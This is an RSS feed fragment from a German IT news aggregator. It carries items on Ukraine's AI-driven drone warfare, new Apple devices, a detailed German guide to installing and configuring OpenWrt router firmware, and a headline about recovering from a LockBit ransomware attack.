<content:encoded><![CDATA[fjo3 shares a report from Defense One: A small but growing number of European officials and analysts are saying what four years ago was unthinkable: Ukraine isn't just surviving its grueling war with Russia, it is in some ways thriving and may even be on a path to victory. This isn't yet captured in headlines -- for example, about last weekend's barrage of Russian drones and missiles around Ukraine -- but in the details, like how some 90 percent were intercepted. Several long-term trends have shifted in Ukraine's favor, and the core reason is its fierce focus on AI and robotics.
 
In the crucible of war, Ukraine has developed drones and ground robots that can hold territory -- even take it back. Some are fully controlled by humans, like supply robots and medical-evacuation vehicles. But an increasing number are controlled in at least some aspects by dozens of AI products, from guidance packages on aerial drones to decision aids at the highest levels. [...] Just as important as the tech are the new tactics. Given unusual latitude to experiment, Ukrainian fighters began to develop robot-forward infantry concepts, like combined-arms attacks by airborne and ground systems, "more than a year ago. Right now, we're massively starting to implement this," said Davyd Aloian, deputy secretary of the National Security and Defence Council of Ukraine, the coordinating body on domestic and international security, in an interview.
 
Ukraine and its partners are also steaming ahead on new concepts for highly autonomous defenses against Russian drones, combining ISR sensors and AI to detect and identify enemy drones in less time and with more certainty. "All of the systems are being linked with each other and with people" to create a distributed network with interceptor drones at various locations to be activated when needed, Aloian said. "One day we will have only like 10 guys who are just going to be responsible for approving interception. And it will automatically go direct to the target." The human operators will be dispersed as well. "Everything can be controlled from Kyiv, Lviv, from cities in other countries," he said. "It's not what happened to Ukraine" (referencing Russia's barrage of Shahed drones) that "should scare us in Europe," said Swarmer CEO Serhii Kupriienko. It's how quickly Ukraine's "middling" military evolved to counter Russia's invasion.
 
"We are behind by literally 10 years or 20 years" in some defense-technology areas, such as satellite imagery, Kupriienko said, and yet his country has climbed a capability curve that just two years ago seemed insurmountable. So could others, he said. "The answer is always AI solutions and integrating the AI into even the daily routine work within the bureaucracy," he said.
 
"We have evolved since 2022, the industry has and our defense has as well. Right now we are able to provide not only [large quantities of drone] assets but everything what is needed to build out the ecosystem," including parts and production, training, modification, etc. Aloian said.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Thanks+To+Robots%2C+Ukraine+Is+Now+Talking+About+Winning%2C+Not+Just+Surviving%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F02%2F2348244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F02%2F2348244%2Fthanks-to-robots-ukraine-is-now-talking-about-winning-not-just-surviving%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/06/02/2348244/thanks-to-robots-ukraine-is-now-talking-about-winning-not-just-surviving?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Warten auf Siri: Neue Apple TV und HomePod mini stehen bereit]]></title>
<description><![CDATA[Nächste Woche stellt Apple seine neuen Software-Hauptversionen vor. Teil von iOS 27 und Co wird wohl die smartere Siri und neue Apple Intelligence-Funktionen sein. Auf ... Weiterlesen ...
Der Beitrag Warten auf Siri: Neue Apple TV und HomePod mini stehen bereit erschien zuerst auf Apfelpage.]]></description>
<link>https://tsecurity.de/de/3562265/ios-mac-os/warten-auf-siri-neue-apple-tv-und-homepod-mini-stehen-bereit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562265/ios-mac-os/warten-auf-siri-neue-apple-tv-und-homepod-mini-stehen-bereit/</guid>
<pubDate>Mon, 01 Jun 2026 09:52:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img width="1306" height="653" src="https://www.apfelpage.de/wp-content/uploads/2024/07/Apple-HomePod-mini-midnight-e1721116311563.jpg" class="type:primaryImage wp-post-image" alt="HomePod mini Mitternacht" decoding="async" fetchpriority="high" srcset="https://www.apfelpage.de/wp-content/uploads/2024/07/Apple-HomePod-mini-midnight-e1721116311563.jpg 1306w, https://www.apfelpage.de/wp-content/uploads/2024/07/Apple-HomePod-mini-midnight-e1721116311563-570x285.jpg 570w, https://www.apfelpage.de/wp-content/uploads/2024/07/Apple-HomePod-mini-midnight-e1721116311563-564x282.jpg 564w, https://www.apfelpage.de/wp-content/uploads/2024/07/Apple-HomePod-mini-midnight-e1721116311563-768x384.jpg 768w, https://www.apfelpage.de/wp-content/uploads/2024/07/Apple-HomePod-mini-midnight-e1721116311563-270x135.jpg 270w, https://www.apfelpage.de/wp-content/uploads/2024/07/Apple-HomePod-mini-midnight-e1721116311563-512x256.jpg 512w, https://www.apfelpage.de/wp-content/uploads/2024/07/Apple-HomePod-mini-midnight-e1721116311563-1024x512.jpg 1024w" sizes="(max-width: 1306px) 100vw, 1306px"></figure>
<p>Nächste Woche stellt Apple seine neuen Software-Hauptversionen vor. Teil von iOS 27 und Co wird wohl die smartere Siri und neue Apple Intelligence-Funktionen sein. Auf ... <a title="Warten auf Siri: Neue Apple TV und HomePod mini stehen bereit" class="read-more" href="https://www.apfelpage.de/news/warten-auf-siri-neue-apple-tv-und-homepod-mini-stehen-bereit/" aria-label="Mehr Informationen über Warten auf Siri: Neue Apple TV und HomePod mini stehen bereit">Weiterlesen ...</a></p>
<p>Der Beitrag <a href="https://www.apfelpage.de/news/warten-auf-siri-neue-apple-tv-und-homepod-mini-stehen-bereit/">Warten auf Siri: Neue Apple TV und HomePod mini stehen bereit</a> erschien zuerst auf <a href="https://www.apfelpage.de/">Apfelpage</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mit dieser Software holen Sie mehr aus Ihrem Router raus]]></title>
<description><![CDATA[OpenWrt ist ein Linux-basiertes Betriebssystem für Router und andere eingebettete Systeme, auf denen Linux grundsätzlich installiert werden kann. Die Software ersetzt die herstellereigene Firmware vollständig und stellt ein frei konfigurierbares System bereit. 



Im Gegensatz zu klassischen Rout...]]></description>
<link>https://tsecurity.de/de/3560280/it-nachrichten/mit-dieser-software-holen-sie-mehr-aus-ihrem-router-raus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560280/it-nachrichten/mit-dieser-software-holen-sie-mehr-aus-ihrem-router-raus/</guid>
<pubDate>Sun, 31 May 2026 08:16:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://openwrt.org/" target="_blank" rel="noreferrer noopener">OpenWrt</a> ist ein Linux-basiertes Betriebssystem für Router und andere eingebettete Systeme, auf denen Linux grundsätzlich installiert werden kann. Die Software ersetzt die herstellereigene Firmware vollständig und stellt ein frei konfigurierbares System bereit. </p>



<p>Im Gegensatz zu klassischen Router-Betriebssystemen arbeitet OpenWrt mit einem beschreibbaren Dateisystem und integriertem Paketmanagement. Dadurch erweitert sich der Router funktional zu einer Plattform, auf der sich zahlreiche Dienste nach Bedarf installieren und betreiben lassen.</p>



<p>Das System läuft auf einer Vielzahl unterschiedlicher Hardwarearchitekturen. <a href="https://www.amazon.de/s?k=openwrt+router&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Neben klassischen Consumer-Routern</a> unterstützt OpenWrt ARM- und MIPS-Plattformen sowie x86-Systeme. Diese breite Unterstützung ermöglicht einen geräteunabhängigen Betrieb mit identischer Oberfläche und vergleichbarer Konfiguration.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1bd049974cf"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/Der-beste-Router.png?w=1200" alt="Der beste Router" class="wp-image-3059996" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Foundry mit Material von Fritz und Telekom</p></div>



<h2 class="wp-block-heading toc">Architektur und Funktionsprinzip</h2>



<p>OpenWrt stellt kein fest definiertes Funktionspaket bereit, sondern ein modulares System. Nach der Installation steht ein minimales Basissystem zur Verfügung, das Routing, Netzwerkdienste und Firewall-Regeln abbildet. Weitere Funktionen lassen sich über Pakete nachinstallieren. Dazu zählen DNS-Server, VPN-Dienste, Monitoring-Werkzeuge oder Werbeblocker.</p>



<p>Die Verwaltung erfolgt über die Weboberfläche “LuCI” sowie optional über die Kommandozeile. Beide Wege greifen auf dieselbe Konfigurationsbasis zu. Änderungen wirken unmittelbar auf das System und lassen sich jederzeit anpassen. Dadurch behalten Sie die vollständige Kontrolle über alle Netzwerkfunktionen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1bd04997e74"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/shells_terminals_begriffe_linux_6.jpg?quality=50&amp;strip=all" alt="SSH ist flexibel und nicht nur als CLI-Shell zu erreichen: Zum Datenaustausch eignet sich der Midnight Commander, der SSH-Verbindungen als „Shell- Verbindung“ anbietet." class="wp-image-3044515" width="800" height="291" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>SSH ist flexibel und nicht nur als CLI-Shell zu erreichen: Zum Datenaustausch eignet sich der Midnight Commander, der SSH-Verbindungen als „Shell- Verbindung“ anbietet.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading toc">Hardwareanforderungen und Geräteauswahl</h2>



<p>OpenWrt läuft auf einer großen Bandbreite an Geräten. Voraussetzung bleibt die Unterstützung durch das Projekt. Vor der Installation muss geprüft werden, <a href="https://openwrt.org/supported_devices" target="_blank" rel="noreferrer noopener">ob ein Router kompatibel ist</a>. Im Heimnetz oder in kleinen Unternehmen kommen häufig günstige Consumer-Router zum Einsatz. Viele Modelle lassen sich direkt mit OpenWrt flashen. Entsprechende Geräte sind breit verfügbar, auch <a href="https://www.amazon.de/s?k=openwrt+router&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">im Handel finden sich passende Modelle</a>.</p>



<p>Ein weiterer Ansatz nutzt vorhandene Hardware im Haushalt oder Büro. Ältere Router, darunter auch frühere Gerätegenerationen der Fritzbox, lassen sich oft weiterverwenden. OpenWrt ersetzt dabei die veraltete Firmware und stellt aktuelle Funktionen sowie Sicherheitsupdates bereit. Dadurch verlängert sich die Nutzungsdauer deutlich und vorhandene Hardware erhält neue Einsatzmöglichkeiten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1bd04998be4"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-01.png?w=1200" alt="Openwrt bietet viele Möglichkeiten" class="wp-image-3111024" width="1200" height="821" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Installation und erste Schritte</h2>



<p>Die Installation erfolgt modellabhängig. In vielen Fällen reicht ein Firmware-Update über die Weboberfläche des Herstellers. Dabei wird ein spezielles Image eingespielt, das OpenWrt enthält. Nach einem Neustart übernimmt das System die Kontrolle über das Gerät. Nach der Installation stellt OpenWrt eine Standardkonfiguration bereit. Der Zugriff erfolgt über die IP-Adresse 192.168.1.1. Zu Beginn ist kein Passwort gesetzt, weshalb unmittelbar ein Zugang konfiguriert werden muss.</p>



<p>In der Praxis folgt danach die grundlegende Netzwerkkonfiguration. Dazu zählen die WAN-/Internet-Anbindung über DHCP oder PPPoE, die Einrichtung von LAN-Segmenten sowie die Aktivierung des WLANs. OpenWrt stellt hierfür bereits vordefinierte Schnittstellen bereit, die sich anpassen lassen.</p>



<p>Ein typisches Szenario nutzt OpenWrt als zentralen Router hinter einem bestehenden Internetanschluss. Nach der Installation wird die WAN-Internet-Schnittstelle auf DHCP gesetzt. Das Gerät erhält automatisch eine IP-Adresse vom vorhandenen Router oder Modem. </p>



<p>Anschließend erfolgt die WLAN-Konfiguration. OpenWrt erkennt vorhandene Funkmodule und stellt separate Schnittstellen für 2,4 GHz und 5 GHz bereit. Sie definieren SSIDs, wählen Verschlüsselung und setzen Zugriffsschlüssel. WPA2 oder WPA3 stehen dabei ebenfalls zur Verfügung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1bd04999713"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-02.png?w=1200" alt="Openwrt einrichten" class="wp-image-3111025" width="1200" height="455" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Praxisbeispiel im Heimnetz</h2>



<p>Ergänzend lässt sich die Firewall anpassen. OpenWrt verwendet standardmäßig getrennte Zonen für LAN und WAN/Internet. Regeln können erweitert werden, um Portfreigaben oder interne Dienste abzubilden. VLANs lassen sich direkt über die Netzwerkschnittstellen konfigurieren, wodurch sich separate Netze für Gäste oder IoT-Geräte realisieren lassen.</p>



<p>Ein weiteres praktisches Szenario umfasst die Integration eines VPN-Dienstes. OpenWrt unterstützt zum Beispiel WireGuard oder OpenVPN. Damit lässt sich ein sicherer Zugriff auf das Heimnetz aus externen Netzen umsetzen. Ebenso kann der gesamte Datenverkehr über einen VPN-Anbieter geleitet werden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1bd0499a24d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/vpn_open_vpn_wireguard.jpg?quality=50&amp;strip=all&amp;w=1200" alt="VPN: Wireguard oder Open VPN?" class="wp-image-2883359" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">monticello / Shutterstock.com</p></div>



<h2 class="wp-block-heading toc">Neue Funktionen in OpenWrt 25.12.x</h2>



<p>Version 25.12 bringt mehrere technische Änderungen, die den Betrieb vereinfachen und erweitern. Eine zentrale Neuerung betrifft die Systemaktualisierung. Die Funktion “Attended SysUpgrade” integriert Updates direkt in die Weboberfläche. OpenWrt lädt passende Images automatisch und berücksichtigt installierte Pakete. </p>



<p>Dadurch entfällt die manuelle Neuinstallation von Erweiterungen nach einem Update. Ein weiterer Schritt betrifft den Paketmanager. Statt des bisherigen Systems kommt der Alpine Package Keeper zum Einsatz. Die neue Paketverwaltung arbeitet ressourcenschonend und nutzt signierte Pakete. Befehle ändern sich entsprechend, was bei manueller Administration berücksichtigt werden muss.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1bd0499ac14"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-03.png" alt="OpenWrt herunterladen" class="wp-image-3111026" width="940" height="395" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Zusätzlich führt OpenWrt eine optionale Shell-Historie ein. Befehle bleiben damit auch nach Sitzungsende verfügbar. Die Integration eines Video-Feeds erweitert den Router um Funktionen zur Verarbeitung von Kamera-Streams. In Verbindung mit VPN ergibt sich eine einfache Lösung für entfernten Zugriff auf Videoquellen.</p>



<p>Die WLAN-Verwaltung wurde intern überarbeitet. Skripte basieren auf einer neuen Laufzeitumgebung, was die Wartbarkeit verbessert und bestimmte Abläufe beschleunigt. Ergänzend erweitert sich die Hardwareunterstützung um zahlreiche neue Geräte und Chipsätze.</p>



<h2 class="wp-block-heading toc">Vorteile im praktischen Einsatz</h2>



<p>OpenWrt bietet vollständige Kontrolle über das Netzwerk. Alle Konfigurationsparameter bleiben zugänglich und lassen sich an individuelle Anforderungen anpassen. Herstellerabhängigkeiten entfallen, da das System auf unterschiedlichen Geräten identisch arbeitet. Ein weiterer Vorteil liegt in der Update-Strategie. </p>



<p>OpenWrt erhält kontinuierlich Sicherheitsupdates, auch für ältere Hardware. Dadurch bleibt die Infrastruktur langfristig wartbar, auch wenn ein Gerät vom eigentlichen Hersteller nicht mehr unterstützt wird.</p>



<p>Die modulare Architektur ermöglicht eine gezielte Erweiterung. Sie installieren nur benötigte Komponenten und halten das System schlank. Gleichzeitig lassen sich komplexe Funktionen auf kompakten Geräten realisieren.</p>



<h2 class="wp-block-heading toc">Einschränkungen und Aufwand</h2>



<p>Die Flexibilität bringt einen höheren Konfigurationsaufwand mit sich. OpenWrt erfordert grundlegende Kenntnisse in Netzwerktechnik und Linux. Viele Funktionen stehen nicht automatisch bereit, sondern müssen eingerichtet werden. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1bd0499b90e"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/12/pcw02_Get-DnsClientServerAddress_RGBeci.jpg?quality=50&amp;strip=all" alt="Cmdlet Get-DnsClientServerAddress" class="wp-image-3018113" width="1024" height="421" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>In einem Heimnetz erfahren Sie über das Cmdlet Get-DnsClientServerAddress in der Regel lediglich die IP-Adresse Ihres Routers.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Auch die Hardware setzt Grenzen. Consumer-Router verfügen über begrenzten Speicher und Rechenleistung. Umfangreiche Dienste oder hohe Datenraten erfordern leistungsfähigere Geräte. Die Installation birgt ein gewisses Risiko. </p>



<p>Fehler beim Flash-Vorgang können ein Gerät unbrauchbar machen. Daher sind die Auswahl kompatibler Hardware und die Beachtung der jeweiligen Anleitung zwingend erforderlich.</p>



<h2 class="wp-block-heading toc">OpenWrt auf der Fritzbox</h2>



<p>OpenWrt lässt sich auf bestimmten Fritzbox-Modellen installieren, sofern die Hardware auf unterstützten SoCs basiert und der Bootprozess keine restriktiven Signaturprüfungen erzwingt. Relevant sind vor allem ältere Gerätegenerationen mit Lantiq- oder Atheros-Chipsätzen. Dazu zählen unter anderem AVM Fritzbox 7362 SL, AVM Fritzbox 7412, AVM Fritzbox 7430 sowie AVM Fritzbox 3490 (<a href="https://www.pcwelt.de/article/1157690/fritzbox-router-im-vergleich-das-beste-modell.html" target="_blank" rel="noreferrer noopener">Fritzbox-Router im Vergleich: Welches ist das beste Modell?</a>). Diese Geräte besitzen in der Regel ausreichend RAM und Flash für ein minimales OpenWrt-System und lassen sich über Recovery-Mechanismen oder modifizierte Firmware-Images flashen. Die Installation erfolgt modellabhängig über das AVM-Recovery-Tool, den EVA-Bootloader oder ein Web-Interface, sofern ein passendes Factory-Image vorliegt.</p>



<p>Technisch relevant bleibt die Trennung zwischen Router- und DSL-Funktion. Die DSL-Modems in Fritzboxen basieren auf proprietären Firmware-Blobs, für die keine freien Treiber verfügbar sind. OpenWrt nutzt daher bei diesen Geräten nur die Routing- und Switching-Komponenten. In der Praxis läuft die Box dann hinter einem externen Modem oder einem vorgeschalteten Router. Ethernet-Ports, VLAN-Konfiguration und Firewall arbeiten vollständig unter OpenWrt, das integrierte DSL-Interface bleibt jedoch ungenutzt.</p>



<p>Auch beim WLAN ergeben sich Unterschiede. Ältere Modelle mit Atheros- oder kompatiblen Chips lassen sich meist vollständig integrieren, inklusive WPA2 und WPA3. Bei Lantiq-Plattformen kann die WLAN-Leistung eingeschränkt sein, da Hardware-Offloading oder proprietäre Erweiterungen fehlen. <strong>Aber Achtung: Funktionen aus FRITZ!OS wie DECT-Basisstation, Telefonie oder AVM-spezifische Dienste stehen unter OpenWrt nicht zur Verfügung, da diese eng an die Originalfirmware gebunden sind.</strong></p>



<p>Neuere Geräte wie <a href="https://amazon.de/dp/B07SJTR4DD?tag=pcwelt.de-21&amp;ascsubtag=rss">AVM Fritzbox 7590</a> (<a href="https://www.pcwelt.de/article/1166494/test-die-fritzbox-7590-auf-dem-pruefstand.html" target="_blank" rel="noreferrer noopener">Testbericht</a>) oder <a href="https://www.pcwelt.de/article/1173254/avm-fritzbox-7530-wlan-router-test.html">AVM Fritzbox 7530 </a>(<a href="https://www.pcwelt.de/article/1173254/avm-fritzbox-7530-wlan-router-test.html" target="_blank" rel="noreferrer noopener">Testbericht)</a> verwenden modernere SoCs mit stärker abgesicherter Bootkette und proprietären Treibern für DSL und WLAN. Für diese Plattformen existiert kein stabiler OpenWrt-Support. Selbst wenn ein Start möglich wäre, fehlen zentrale Hardwarefunktionen oder die Initialisierung bleibt unvollständig. Kabelmodelle wie <a href="https://amazon.de/dp/B0CKTQSSW2?tag=pcwelt.de-21&amp;ascsubtag=rss">AVM Fritzbox 6660 Cable</a> sind grundsätzlich ausgeschlossen, da die DOCSIS-Komponenten vollständig proprietär arbeiten.</p>



<p>Ältere Fritzboxen eignen sich als kostengünstige OpenWrt-Systeme für Routing, VLAN-Segmentierung, VPN-Gateways oder als Access Point. Die Geräte erhalten aktuelle Kernel-Versionen und Sicherheitsupdates, obwohl der Hersteller keine Pflege mehr liefert. Für produktive Internetanschlüsse mit integrierter DSL- oder Kabelanbindung bleibt die Originalfirmware erforderlich, da OpenWrt diese Hardwarebereiche nicht unterstützt.</p>



<h2 class="wp-block-heading toc">Einsatz im kleinen Unternehmen</h2>



<p>In kleinen Unternehmen dient OpenWrt als flexible Netzwerkzentrale. Mehrere VLANs trennen interne Systeme, Gästezugänge und IoT-Komponenten. VPN-Verbindungen verbinden Außenstandorte oder ermöglichen mobilen Zugriff. Durch die Kombination aus Firewall, Routing und Zusatzdiensten lässt sich damit eine kompakte Infrastruktur ohne separate Appliances erstellen. Gleichzeitig bleibt die Konfiguration vollständig kontrollierbar und anpassbar.</p>



<p>OpenWrt ersetzt damit in vielen Szenarien klassische Router-Firmware und erweitert den Funktionsumfang deutlich.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Surviving a LockBit Ransomware Attack: The ROI of Visibility | UpGuard]]></title>
<description><![CDATA[Read how veteran CISO Nick Gicinto saved his alma mater from a LockBit ransomware attack by discarding the standard playbook.]]></description>
<link>https://tsecurity.de/de/3554937/it-security-nachrichten/surviving-a-lockbit-ransomware-attack-the-roi-of-visibility-upguard/</link>
